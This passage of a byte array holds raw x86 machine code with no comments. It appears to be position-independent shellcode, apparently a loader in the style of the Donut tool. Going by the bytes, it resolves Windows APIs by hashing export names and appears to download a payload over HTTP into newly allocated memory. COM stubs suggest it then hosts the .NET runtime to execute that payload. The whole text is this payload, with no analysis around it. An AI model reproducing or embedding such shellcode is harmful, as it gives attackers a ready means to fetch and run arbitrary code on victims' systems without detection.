127 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
128 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0xf7, 0x1a,
129 0x00, 0x00, 0x81, 0xeb, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55,
130 0xe8, 0x55, 0x1f, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10,
131 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0,
132 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x81,
133 0xec, 0x58, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0x6a, 0x3c, 0x5e, 0x33,
134 0xff, 0x8d, 0x44, 0x24, 0x28, 0x56, 0x57, 0x50, 0x89, 0x7c, 0x24, 0x1c,
135 0xbb, 0x00, 0x02, 0x60, 0x84, 0xe8, 0x38, 0x1f, 0x00, 0x00, 0x8d, 0x44,
136 0x24, 0x70, 0x89, 0x74, 0x24, 0x34, 0x8b, 0xb4, 0x24, 0x74, 0x02, 0x00,
137 0x00, 0x83, 0xc4, 0x0c, 0x89, 0x44, 0x24, 0x38, 0x8d, 0x84, 0x24, 0x64,
138 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x54, 0xb8, 0x00, 0x01, 0x00, 0x00,
139 0x89, 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x58, 0x8d, 0x44, 0x24, 0x28,
140 0x50, 0x68, 0x00, 0x00, 0x00, 0x10, 0x57, 0x8d, 0x86, 0xe8, 0x06, 0x00,
141 0x00, 0x50, 0xff, 0x96, 0x90, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84,
142 0xac, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x83, 0x7c, 0x24, 0x34, 0x04, 0x57,
143 0x57, 0x0f, 0x94, 0xc0, 0x57, 0x89, 0x44, 0x24, 0x20, 0xb8, 0x00, 0x32,
144 0xe0, 0x84, 0x57, 0x57, 0x0f, 0x44, 0xd8, 0xff, 0x96, 0x94, 0x00, 0x00,
145 0x00, 0x89, 0x44, 0x24, 0x24, 0x85, 0xc0, 0x0f, 0x84, 0x7f, 0x01, 0x00,
146 0x00, 0x57, 0x57, 0x6a, 0x03, 0x57, 0x57, 0xff, 0x74, 0x24, 0x54, 0x8d,
147 0x4c, 0x24, 0x7c, 0x51, 0x50, 0xff, 0x96, 0x98, 0x00, 0x00, 0x00, 0x8b,
148 0xc8, 0x89, 0x4c, 0x24, 0x20, 0x85, 0xc9, 0x0f, 0x84, 0xfb, 0x00, 0x00,
149 0x00, 0x55, 0x57, 0x53, 0x57, 0x57, 0x57, 0x8d, 0x84, 0x24, 0x7c, 0x01,
150 0x00, 0x00, 0x50, 0x8d, 0x86, 0xe8, 0x07, 0x00, 0x00, 0x50, 0x51, 0xff,
151 0x96, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xca,
152 0x00, 0x00, 0x00, 0x39, 0x7c, 0x24, 0x18, 0x74, 0x20, 0xf7, 0xc3, 0x00,
153 0x10, 0x00, 0x00, 0x74, 0x18, 0x6a, 0x04, 0x8d, 0x44, 0x24, 0x20, 0xc7,
154 0x44, 0x24, 0x20, 0x80, 0x33, 0x00, 0x00, 0x50, 0x6a, 0x1f, 0x55, 0xff,
155 0x96, 0x9c, 0x00, 0x00, 0x00, 0x57, 0x57, 0x57, 0x57, 0x55, 0xff, 0x96,
156 0xac, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x8a, 0x00, 0x00, 0x00,
157 0x57, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, 0x00,
158 0x00, 0x50, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0x68, 0x13, 0x00, 0x00, 0x20,
159 0x55, 0xff, 0x96, 0xb0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x67, 0x81,
160 0x7c, 0x24, 0x14, 0xc8, 0x00, 0x00, 0x00, 0x75, 0x5d, 0x57, 0x8d, 0x44,
161 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, 0x00, 0x00, 0x50, 0x8d,
162 0x9e, 0x18, 0x09, 0x00, 0x00, 0x53, 0x68, 0x05, 0x00, 0x00, 0x20, 0x55,
163 0x89, 0x3b, 0x89, 0x7b, 0x04, 0xff, 0x96, 0xb0, 0x00, 0x00, 0x00, 0x85,
164 0xc0, 0x74, 0x33, 0x8b, 0x03, 0x0b, 0x43, 0x04, 0x74, 0x2c, 0x6a, 0x04,
165 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x33, 0x57, 0xff, 0x56, 0x3c, 0x89,
166 0x86, 0x20, 0x09, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x15, 0x8d, 0x4c, 0x24,
167 0x20, 0x89, 0x7c, 0x24, 0x20, 0x51, 0xff, 0x33, 0x50, 0x55, 0xff, 0x96,
168 0xa0, 0x00, 0x00, 0x00, 0x8b, 0xf8, 0x55, 0xff, 0x96, 0xa4, 0x00, 0x00,
169 0x00, 0xff, 0x74, 0x24, 0x24, 0xff, 0x96, 0xa4, 0x00, 0x00, 0x00, 0x5d,
170 0xff, 0x74, 0x24, 0x24, 0xff, 0x96, 0xa4, 0x00, 0x00, 0x00, 0x85, 0xff,
171 0x74, 0x4e, 0x83, 0xbe, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x45, 0xff,
172 0xb6, 0x18, 0x09, 0x00, 0x00, 0x8b, 0x9e, 0x20, 0x09, 0x00, 0x00, 0x8d,
173 0x86, 0x08, 0x09, 0x00, 0x00, 0x53, 0x50, 0x8d, 0x86, 0xf8, 0x08, 0x00,
174 0x00, 0x50, 0xe8, 0x48, 0x1a, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86,
175 0xf0, 0x07, 0x00, 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0x11, 0x19, 0x00,
176 0x00, 0x83, 0xc4, 0x1c, 0x3b, 0x83, 0x18, 0x05, 0x00, 0x00, 0x75, 0x0c,
177 0x3b, 0x93, 0x1c, 0x05, 0x00, 0x00, 0x75, 0x04, 0x8b, 0xc7, 0xeb, 0x02,
178 0x33, 0xc0, 0x5f, 0x5e, 0x5b, 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0xc3,
179 0x81, 0xec, 0xdc, 0x01, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24,
180 0xf0, 0x01, 0x00, 0x00, 0x57, 0x8b, 0x6e, 0x3c, 0x8b, 0x44, 0x2e, 0x78,
181 0x85, 0xc0, 0x0f, 0x84, 0xe5, 0x00, 0x00, 0x00, 0x8d, 0x3c, 0x30, 0x8b,
182 0x5f, 0x18, 0x85, 0xdb, 0x0f, 0x84, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x47,
183 0x1c, 0x33, 0xd2, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24,
184 0x24, 0x8b, 0x47, 0x20, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x14, 0x8b, 0x47,
185 0x24, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x20, 0x8b, 0x47, 0x0c, 0x03, 0xc6,
186 0x8a, 0x08, 0x84, 0xc9, 0x74, 0x2a, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x94,
187 0x24, 0xe8, 0x00, 0x00, 0x00, 0x2b, 0xd0, 0x80, 0xc9, 0x20, 0x46, 0x88,
188 0x0c, 0x02, 0x40, 0x8a, 0x08, 0x84, 0xc9, 0x75, 0xf2, 0x89, 0x74, 0x24,
189 0x10, 0x8b, 0xb4, 0x24, 0xf4, 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10,
190 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00,
191 0x00, 0x00, 0xc6, 0x84, 0x14, 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4,
192 0x24, 0x04, 0x02, 0x00, 0x00, 0x50, 0xe8, 0x47, 0x18, 0x00, 0x00, 0x89,
193 0x44, 0x24, 0x24, 0x83, 0xc4, 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0,
194 0xfc, 0x89, 0x54, 0x24, 0x1c, 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10,
195 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24,
196 0x04, 0x02, 0x00, 0x00, 0x03, 0xce, 0x51, 0xe8, 0x16, 0x18, 0x00, 0x00,
197 0x33, 0x44, 0x24, 0x24, 0x83, 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b,
198 0x84, 0x24, 0xf8, 0x01, 0x00, 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc,
199 0x01, 0x00, 0x00, 0x74, 0x1d, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04,
200 0x89, 0x44, 0x24, 0x10, 0x83, 0xeb, 0x01, 0x75, 0xbb, 0x33, 0xc0, 0x5f,
201 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xdc, 0x01, 0x00, 0x00, 0xc3, 0x8b, 0x44,
202 0x24, 0x20, 0x8b, 0x4c, 0x24, 0x24, 0x0f, 0xb7, 0x44, 0x58, 0xfe, 0x8b,
203 0x0c, 0x81, 0x03, 0xce, 0x3b, 0xcf, 0x72, 0x7d, 0x8b, 0x44, 0x2e, 0x7c,
204 0x03, 0xc7, 0x3b, 0xc8, 0x73, 0x73, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x1e,
205 0x8d, 0x7c, 0x24, 0x28, 0x8b, 0xf1, 0x2b, 0xf9, 0x83, 0xfa, 0x3c, 0x73,
206 0x11, 0x8a, 0x06, 0x88, 0x04, 0x37, 0x80, 0x3e, 0x2e, 0x74, 0x07, 0x42,
207 0x46, 0x80, 0x3e, 0x00, 0x75, 0xea, 0xc7, 0x44, 0x14, 0x29, 0x64, 0x6c,
208 0x6c, 0x00, 0x42, 0x03, 0xca, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x17, 0x8d,
209 0x74, 0x24, 0x68, 0x2b, 0xf1, 0x83, 0xfa, 0x7f, 0x73, 0x0c, 0x8a, 0x01,
210 0x42, 0x88, 0x04, 0x0e, 0x41, 0x80, 0x39, 0x00, 0x75, 0xef, 0x8b, 0xb4,
211 0x24, 0xf0, 0x01, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x28, 0x50, 0xc6, 0x44,
212 0x14, 0x6c, 0x00, 0xff, 0x56, 0x30, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x4c,
213 0x24, 0x68, 0x51, 0x50, 0xff, 0x56, 0x34, 0x8b, 0xc8, 0xeb, 0x02, 0x33,
214 0xc9, 0x8b, 0xc1, 0xe9, 0x5b, 0xff, 0xff, 0xff, 0x56, 0x8b, 0x74, 0x24,
215 0x0c, 0x57, 0x33, 0xff, 0x8b, 0x4e, 0x18, 0x85, 0xc9, 0x74, 0x09, 0x8b,
216 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x18, 0x8b, 0x4e, 0x1c, 0x85,
217 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x1c,
218 0x8b, 0x4e, 0x14, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50,
219 0x08, 0x89, 0x7e, 0x14, 0x8b, 0x4e, 0x10, 0x85, 0xc9, 0x74, 0x09, 0x8b,
220 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x10, 0x8b, 0x4e, 0x0c, 0x85,
221 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x0c,
222 0x8b, 0x4e, 0x08, 0x85, 0xc9, 0x74, 0x12, 0x8b, 0x01, 0x51, 0xff, 0x50,
223 0x2c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x89, 0x7e,
224 0x08, 0x8b, 0x4e, 0x04, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff,
225 0x50, 0x08, 0x89, 0x7e, 0x04, 0x8b, 0x0e, 0x85, 0xc9, 0x74, 0x08, 0x8b,
226 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x3e, 0x5f, 0x5e, 0xc3, 0x8b, 0x44,
227 0x24, 0x04, 0x83, 0xc0, 0x10, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04,
228 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x0c, 0x00, 0xb8, 0x01, 0x40,
229 0x00, 0x80, 0xc2, 0x10, 0x00, 0x8b, 0x44, 0x24, 0x04, 0xff, 0x74, 0x24,
230 0x18, 0xff, 0x74, 0x24, 0x14, 0x8b, 0x40, 0x08, 0xff, 0x74, 0x24, 0x14,
231 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0xc2, 0x18, 0x00, 0xb8, 0x01, 0x40,
232 0x00, 0x80, 0xc2, 0x14, 0x00, 0x57, 0x8b, 0x7c, 0x24, 0x14, 0x85, 0xff,
233 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x16, 0x56, 0x8b, 0x74,
234 0x24, 0x0c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04, 0x8b,
235 0x46, 0x08, 0x89, 0x07, 0x33, 0xc0, 0x5e, 0x5f, 0xc2, 0x10, 0x00, 0x8b,
236 0x44, 0x24, 0x08, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
237 0xeb, 0x08, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x08,
238 0x00, 0x55, 0x8b, 0xec, 0xff, 0x75, 0x28, 0x8b, 0x45, 0x08, 0xff, 0x75,
239 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff, 0x75, 0x1c, 0xff, 0x75,
240 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51, 0xff, 0x52, 0x2c, 0x5d,
241 0xc2, 0x24, 0x00, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x04, 0x02, 0x00, 0x00,
242 0x53, 0x56, 0x57, 0xe8, 0xa5, 0x15, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0xb9,
243 0xd2, 0x1d, 0x40, 0x00, 0xbf, 0xed, 0x30, 0x40, 0x00, 0x2b, 0xcf, 0x03,
244 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0x8b, 0x15, 0x00, 0x00, 0xb9, 0x8a,
245 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04,
246 0xe8, 0x78, 0x15, 0x00, 0x00, 0xb9, 0x5b, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
247 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08, 0xe8, 0x65, 0x15, 0x00, 0x00,
248 0xb9, 0xf7, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
249 0x48, 0x0c, 0xe8, 0x52, 0x15, 0x00, 0x00, 0xb9, 0xcd, 0x1a, 0x40, 0x00,
250 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x10, 0xe8, 0x3f, 0x15,
251 0x00, 0x00, 0xb9, 0xa9, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
252 0x06, 0x89, 0x48, 0x14, 0xe8, 0x2c, 0x15, 0x00, 0x00, 0xb9, 0x11, 0x1b,
253 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8,
254 0x19, 0x15, 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
255 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8, 0x06, 0x15, 0x00, 0x00, 0xb9,
256 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
257 0x20, 0xe8, 0xf3, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b,
258 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x24, 0xe8, 0xe0, 0x14, 0x00,
259 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
260 0x89, 0x48, 0x28, 0xe8, 0xcd, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40,
261 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x2c, 0xe8, 0xba,
262 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
263 0x8b, 0x06, 0x89, 0x48, 0x30, 0xe8, 0xa7, 0x14, 0x00, 0x00, 0xb9, 0x43,
264 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x34,
265 0xe8, 0x94, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
266 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x38, 0xe8, 0x81, 0x14, 0x00, 0x00,
267 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
268 0x48, 0x3c, 0xe8, 0x6e, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00,
269 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x40, 0xe8, 0x5b, 0x14,
270 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
271 0x06, 0x89, 0x48, 0x44, 0xe8, 0x48, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11,
272 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x48, 0xe8,
273 0x35, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
274 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x4c, 0xe8, 0x22, 0x14, 0x00, 0x00, 0xb9,
275 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
276 0x50, 0xe8, 0x0f, 0x14, 0x00, 0x00, 0xb9, 0xa1, 0x1a, 0x40, 0x00, 0x2b,
277 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x54, 0xe8, 0xfc, 0x13, 0x00,
278 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
279 0x89, 0x48, 0x58, 0xe8, 0xe9, 0x13, 0x00, 0x00, 0xb9, 0xc5, 0x1a, 0x40,
280 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x5c, 0xe8, 0xd6,
281 0x13, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
282 0x8b, 0x06, 0x89, 0x48, 0x60, 0xe8, 0xc3, 0x13, 0x00, 0x00, 0xb9, 0x6b,
283 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x64,
284 0xe8, 0xb0, 0x13, 0x00, 0x00, 0xb9, 0x99, 0x1a, 0x40, 0x00, 0x2b, 0xcf,
285 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x68, 0xe8, 0x9d, 0x13, 0x00, 0x00,
286 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
287 0x48, 0x6c, 0xe8, 0x8a, 0x13, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00,
288 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x70, 0xe8, 0x77, 0x13,
289 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x8b, 0x7d, 0x08,
290 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x74, 0x8d, 0x85, 0xfc, 0xfd, 0xff,
291 0xff, 0x83, 0x66, 0x10, 0x00, 0x50, 0x8d, 0x87, 0xe8, 0x05, 0x00, 0x00,
292 0x89, 0x7e, 0x14, 0x50, 0x57, 0xe8, 0x30, 0x13, 0x00, 0x00, 0x83, 0xc4,
293 0x0c, 0x8d, 0x5e, 0x04, 0x8d, 0x85, 0xfc, 0xfd, 0xff, 0xff, 0x53, 0x50,
294 0xff, 0x97, 0x8c, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x13, 0x8b, 0x0b,
295 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87, 0x84, 0x06, 0x00, 0x00, 0x50, 0x8b,
296 0x11, 0x51, 0xff, 0x52, 0x18, 0x5f, 0x5e, 0x5b, 0xc9, 0xc3, 0x8b, 0x54,
297 0x24, 0x0c, 0x85, 0xd2, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb,
298 0x5f, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, 0xc9, 0x56, 0x8b, 0x74, 0x24,
299 0x0c, 0x57, 0x8b, 0x7e, 0x14, 0x8b, 0x84, 0x8f, 0xf4, 0x05, 0x00, 0x00,
300 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, 0xeb,
301 0x2a, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x04, 0x06, 0x00, 0x00, 0x3b, 0x04,
302 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, 0xeb, 0x14, 0x33,
303 0xc9, 0x8b, 0x84, 0x8f, 0x84, 0x06, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75,
304 0x0c, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, 0x89, 0x32, 0x33, 0xc0, 0xeb,
305 0x08, 0x83, 0x22, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b,
306 0xc2, 0x0c, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x6a, 0x00, 0x6a, 0x00, 0x6a,
307 0xfd, 0x8b, 0x40, 0x0c, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x38, 0x33, 0xc0,
308 0xc2, 0x08, 0x00, 0x8b, 0x4c, 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0, 0x0f,
309 0xc1, 0x41, 0x10, 0x48, 0xc2, 0x04, 0x00, 0x8b, 0x44, 0x24, 0x04, 0xff,
310 0x74, 0x24, 0x08, 0x8b, 0x40, 0x14, 0xff, 0x50, 0x4c, 0x33, 0xc0, 0xc2,
311 0x08, 0x00, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x80, 0x00, 0x00, 0x00, 0x56,
312 0x8b, 0x75, 0x08, 0x57, 0x81, 0xc6, 0x6c, 0x04, 0x00, 0x00, 0x8a, 0x0e,
313 0x33, 0xc0, 0x84, 0xc9, 0x74, 0x3f, 0x8d, 0x7d, 0x80, 0x8b, 0xd6, 0x2b,
314 0xfe, 0x80, 0xf9, 0x3b, 0x74, 0x12, 0x3d, 0x80, 0x00, 0x00, 0x00, 0x7d,
315 0x0b, 0x88, 0x0c, 0x17, 0x40, 0x42, 0x8a, 0x0a, 0x84, 0xc9, 0x75, 0xe9,
316 0x85, 0xc0, 0x74, 0x1d, 0xff, 0x75, 0x0c, 0x46, 0xc6, 0x44, 0x05, 0x80,
317 0x00, 0x03, 0xf0, 0x8d, 0x45, 0x80, 0x50, 0xe8, 0xc3, 0x16, 0x00, 0x00,
318 0x59, 0x59, 0x85, 0xc0, 0x75, 0xbc, 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f,
319 0x5e, 0xc9, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x1c, 0x83, 0x7d, 0x0c,
320 0x00, 0x74, 0x31, 0x6a, 0x1c, 0x8d, 0x45, 0xe4, 0x50, 0x8b, 0x45, 0x08,
321 0xff, 0x75, 0x0c, 0xff, 0x50, 0x44, 0x83, 0xf8, 0x1c, 0x75, 0x1d, 0x81,
322 0x7d, 0xf4, 0x00, 0x10, 0x00, 0x00, 0x75, 0x14, 0x81, 0x7d, 0xfc, 0x00,
323 0x00, 0x02, 0x00, 0x75, 0x0b, 0x83, 0x7d, 0xf8, 0x04, 0x75, 0x05, 0x33,
324 0xc0, 0x40, 0xc9, 0xc3, 0x33, 0xc0, 0xc9, 0xc3, 0x81, 0xec, 0x10, 0x02,
325 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0x18, 0x02, 0x00, 0x00, 0x33, 0xc0,
326 0x21, 0x44, 0x24, 0x04, 0x55, 0x8b, 0xac, 0x24, 0x24, 0x02, 0x00, 0x00,
327 0x8b, 0x8b, 0xb8, 0x00, 0x00, 0x00, 0x56, 0x57, 0x85, 0xc9, 0x0f, 0x84,
328 0xaa, 0x00, 0x00, 0x00, 0x55, 0x8d, 0x83, 0x24, 0x06, 0x00, 0x00, 0x50,
329 0x8d, 0x83, 0x14, 0x06, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x8b, 0xb4, 0x24,
330 0x28, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x78, 0x68, 0x8d, 0x44, 0x24, 0x20,
331 0x50, 0x8d, 0x46, 0x0c, 0x50, 0x53, 0xe8, 0x5b, 0x11, 0x00, 0x00, 0x8b,
332 0x55, 0x00, 0x8d, 0x7d, 0x04, 0x83, 0xc4, 0x0c, 0x8d, 0x83, 0x34, 0x06,
333 0x00, 0x00, 0x8b, 0x0a, 0x57, 0x50, 0x8d, 0x44, 0x24, 0x28, 0x50, 0x52,
334 0xff, 0x51, 0x0c, 0x85, 0xc0, 0x78, 0x34, 0x8b, 0x07, 0x8d, 0x54, 0x24,
335 0x14, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x78, 0x30,
336 0x83, 0x7c, 0x24, 0x14, 0x00, 0x74, 0x25, 0x8b, 0x0f, 0x8d, 0x45, 0x08,
337 0x50, 0x8d, 0x83, 0x54, 0x06, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x83,
338 0x44, 0x06, 0x00, 0x00, 0x50, 0x51, 0xff, 0x52, 0x24, 0xeb, 0x09, 0x83,
339 0x27, 0x00, 0xeb, 0x04, 0x83, 0x65, 0x00, 0x00, 0x85, 0xc0, 0x79, 0x34,
340 0x8d, 0x45, 0x08, 0x50, 0x8d, 0x83, 0x54, 0x06, 0x00, 0x00, 0x50, 0x8d,
341 0x83, 0x44, 0x06, 0x00, 0x00, 0x50, 0x6a, 0x00, 0x6a, 0x00, 0xff, 0x93,
342 0xb4, 0x00, 0x00, 0x00, 0xeb, 0x07, 0x8b, 0xb4, 0x24, 0x28, 0x02, 0x00,
343 0x00, 0x85, 0xc0, 0x79, 0x0b, 0x83, 0x65, 0x08, 0x00, 0x33, 0xc0, 0xe9,
344 0xfb, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51,
345 0x28, 0x85, 0xc0, 0x0f, 0x88, 0xe6, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
346 0x20, 0x50, 0x8d, 0x86, 0x0c, 0x01, 0x00, 0x00, 0x50, 0x53, 0xe8, 0xa3,
347 0x10, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x20, 0x50, 0xff,
348 0x93, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8b, 0xf8, 0x8d, 0x45,
349 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x0a, 0x57, 0x52, 0xff, 0x51, 0x30, 0x57,
350 0x8b, 0xf0, 0xff, 0x93, 0x88, 0x00, 0x00, 0x00, 0x85, 0xf6, 0x0f, 0x88,
351 0xa3, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x8d, 0x45, 0x10, 0x50, 0x8d,
352 0x83, 0x64, 0x06, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x52, 0xff, 0x11, 0x85,
353 0xc0, 0x0f, 0x88, 0x88, 0x00, 0x00, 0x00, 0x8b, 0xb4, 0x24, 0x28, 0x02,
